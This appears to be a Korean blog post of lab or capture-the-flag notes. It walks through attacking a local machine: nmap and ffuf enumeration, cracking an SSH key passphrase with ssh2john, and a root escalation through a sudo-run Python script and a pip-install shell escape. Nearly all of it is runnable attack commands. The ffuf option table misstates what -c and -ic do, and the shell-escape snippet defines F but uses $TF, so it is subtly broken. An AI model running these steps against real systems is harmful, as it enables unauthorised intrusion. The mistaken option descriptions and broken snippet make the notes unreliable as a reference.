반응형
nmap -sC -sV -p- 192.168.16.2
dirb http://192.168.16.2
gobuster dir -u http://192.168.16.2 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.16.2/~FUZZ -t 200 -c -fs 0
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.16.2/~secret/.FUZZ -t 200 -c -fc 403 -ic -e .txt
✅ ffuf 옵션 요약
옵션이름설명예시
-u | URL | 공격 대상 URL 설정, FUZZ 위치 지정 | -u http://target.com/FUZZ |
-w | Wordlist | 사용할 단어 리스트 경로 지정 | -w wordlist.txt |
-e | Extensions | 단어에 자동으로 확장자 붙이기 | -e .php,.html,.bak → login.php, login.html, ... |
-c | Cookie | 요청에 쿠키 추가 (로그인 세션 등) | -c "sessionid=abc123" |
-fc | Filter Status Code | 특정 HTTP 응답 코드를 제외하고 결과 출력 | -fc 404,403 |
-fs | Filter Size | 특정 응답 **크기(Byte)**를 제외 | -fs 0 → 빈 응답 제거 |
-ic | Ignore Case | 대소문자 구분 없이 Fuzzing | -ic → admin, Admin, ADMIN 등 모두 시도 |
vi /home/kali/victim_id_rsa
#복호화한 ssh인증서 부분 복사 붙여넣기
chmod 600 /home/kali/victim_id_rsa
ssh2john /home/kali/victim_id_rsa > hash_pass
P@55w0rd!
ssh -i /home/kali/victim_id_rsa id@ip
#비밀번호 입력
sudo -l
cat /home/arsene/heist.py
#linpeas.sh 다운하면 시스템에 웬만한 취약점과 공격방법을 알려주는 스크립트
chmod u+x linpeas.sh
os.system("/bin/bash") 삽입
sudo -u arsene /home/arsene/heist.py
F=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
cd ~
cat root.flag
반응형